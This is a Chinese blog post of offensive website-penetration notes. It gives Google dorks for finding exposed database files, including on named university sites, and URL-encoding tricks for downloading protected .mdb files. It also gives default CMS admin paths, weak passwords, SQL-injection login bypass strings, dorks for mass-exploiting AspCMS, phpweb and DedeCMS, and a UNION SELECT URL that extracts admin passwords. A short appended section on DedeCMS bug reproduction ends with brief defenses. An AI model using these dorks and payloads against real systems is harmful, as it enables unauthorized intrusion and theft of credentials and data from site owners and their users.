渗透漏洞分析--沙窝李的王

弱漏洞利用网站

网站暴库漏洞

暴库(常是Access数据库,文件格式:data.mdb;SQLserver、MySQL—>数据库连接文件),就是通过一些技术或者程序漏洞得到数据库的地址,并将数据库非法下载到本地,

hacker非常乐意这种事件的发生,在得到网站数据库之后,就可以得到网站管理员的账号和密码,对网站进行破坏与管理,也能通过数据库的道德网站的隐私信息,甚至是最高权限。(目录遍历漏洞)

利用方法

inurl:/inc/conn.asp

inurl:inc+conn.asp to parent directort intext:

inurl:/inc/conn.asp

inurl:/inc+conn.asp to parent dirctory

所有可以目录浏览的网页都有一些相同的地方,主要有以下几点:

to parent directory

last madifief Description

转到父目录

而利用Google语法来搜索的语句有:

intitle  intext  inurl  site  filetype等

搜索域名后缀,常见的域名后缀有:

com  net  mil  org  info  gov  edu  biz  coop  areo  pro  int  arpa

e.g

intext:to parent directory + intext:mdb site:fudan.edu.cn

inc/conn.asp—>inc%5cconn.asp(MySQL数据库与可能的路径)

暴库绕过、过防下载

#sdsf.mdb

下载时改成 %23sdsf.mdb

#@!$%^&*asfkladsf@!#.mdb

%23@%21%24%25%5E%26%2aasdfkladsf@%21%23.mdb

高级语法暴库

inurl:./… admin …/… add…

inurl:./… admin…/…del…

inurl:/.asp <id=<%<%<%

下载漏洞

http://ipo.snnu.edu.cn/

http://ipo.snnu.edu.cn/shida/UploadFiles/indentAttFile/201206122041778.doc

http://ipo.snnu.edu.cn/down.asp?fileup=shida/UploadFiles/indentAttFile/2012061222041778.doc

http://www.sxzzy.cn/ggis/news/down.asp?FileName=doc/2101-5/2012053010329973.doc

下载漏洞利用

通过蜘蛛爬行,找到该URL,下载conn.asp  config.php  config.asp  db.mdb

网站后台密码爆破(弱口令 bp)

为了方便管理网站,cms系统畅游管理员后台管理接口,输入账号密码登录进行管理

常见后台

网站常见的cms管理系统有:

织梦  idscuz  帝国  phpweb  WordPress  aspcms  科讯  南方  良精  ecshop等

对应的后台:

dede  admin.php  e/admin  admin.php  wp-admin  admin  admin  admin  admin  admin

还有可能:manager  login_admin  login_manage  login.asp

弱口令猜解

常见弱口令:admin  admin888  admin123  123456等等

逻辑万能秘钥:

asp–> ‘ro’ = ‘or’

php–> admin’ or 1=1==  admin’ or ‘1’='1

破解工具:burpsuite  discuz破解器  py脚本  httpfuzzer(针对带验证码的)

针对性的一些工具:PKav HTTP Fuzzer

将找到的请求包放进去(请求地址,请求包),对密码部分添加标记,对验证码部分添加标记,然后暴力破解。

网站漏洞EXP的利用

EXP是exploit(漏洞利用)的缩写。当我们cms出现漏洞的时候,针对漏洞原理可以写出针对该漏洞的exploit。

有的时候exp可以直接添加管理员或者getshell,爆出管理员账号密码,数据库账号密码。

EXP利用

主流网站基本上都有漏洞和exp

e.g 织梦  phpcms  strusl  phpweb …

EXP收集

百度  交流  利用工具

批量检测站点

常用于某一类型的漏洞站点的安全检测

批量拿站

关键词:

有限公司 – powered by AspCMS v2.0

powered by AspCms 2

powered by AspCms 2.0

AspCms 2.0

powere

关键字:inurl:newgoods.asp:action_key_order=news

利用方法:admin_shopxp/upLoad_bm.asp

漏洞利用:phpweb漏洞

关键字:

inurl:/class/?1.html

inurl:class/index.php?catid=0

inurl:/page/html/?1.html

inurl:news/html/?411.htm

默认后台地址:/admin.php

注入地址:

down/class/index.php?myord=1

news/class/index.php?showtag=

万能密码  admin ‘or ‘1’ =’ 1

织梦批量,搜索关键字:

powered by DedeCMS_V57_UTF8_SP12004-2011 DesDev LNC

inurl:shopxp_news.asp

TEXTBOX2.Asp?action=madify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

织梦CMS(DedeCMS)是一款广泛使用的开源内容管理系统(CMS),由于其功能强大和使用便捷,受到了很多网站开发者的青睐。然而,织梦CMS也存在一些安全漏洞,攻击者可以利用这些漏洞对网站进行攻击。以下是织梦CMS常见漏洞的复现过程: ### 1. SQL注入漏洞 #### 漏洞描述 SQL注入是一种常见的攻击方式,攻击者通过在输入框中输入恶意的SQL语句,从而获取数据库中的敏感信息。 #### 复现步骤 1. **找到注入点**:在织梦CMS中,常见的注入点包括搜索功能、文章ID等。 2. **构造注入语句**:例如,假设文章ID为`1`,可以尝试在URL中加入注入语句: ``` http://www.example.com/plus/view.php?aid=1 and 1=1 ``` 如果页面正常显示,说明存在SQL注入漏洞。 3. **获取数据库信息**:通过构造不同的SQL语句,可以逐步获取数据库的表名、字段名等信息。 ### 2. 文件上传漏洞 #### 漏洞描述 文件上传漏洞是指攻击者通过上传恶意文件(如脚本文件)来获取服务器的控制权。 #### 复现步骤 1. **找到上传点**:在织梦CMS中,常见的上传点包括头像上传、附件上传等。 2. **构造恶意文件**:例如,构造一个包含PHP代码的图片文件: ```php <?php phpinfo(); ?> ``` 3. **上传文件**:将恶意文件上传到服务器。 4. **访问上传文件**:通过浏览器访问上传的文件URL,如果服务器执行了PHP代码,说明存在文件上传漏洞。 ### 3. XSS漏洞 #### 漏洞描述 跨站脚本攻击(XSS)是指攻击者在网页中插入恶意脚本,从而窃取用户信息或进行其他恶意操作。 #### 复现步骤 1. **找到XSS点**:在织梦CMS中,常见的XSS点包括搜索框、留言板等。 2. **构造XSS语句**:例如,在搜索框中输入以下代码: ``` <script>alert('XSS')</script> ``` 3. **提交查询**:如果页面弹出提示框,说明存在XSS漏洞。 ### 防护措施 1. **及时更新**:及时更新织梦CMS到最新版本,修复已知漏洞2. **输入验证**:对用户输入进行严格验证,防止SQL注入和XSS攻击。 3. **文件验证**:对上传的文件进行严格验证,防止文件上传漏洞。 4. **安全配置**:配置Web服务器的安全选项,如禁用不必要的服务和功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值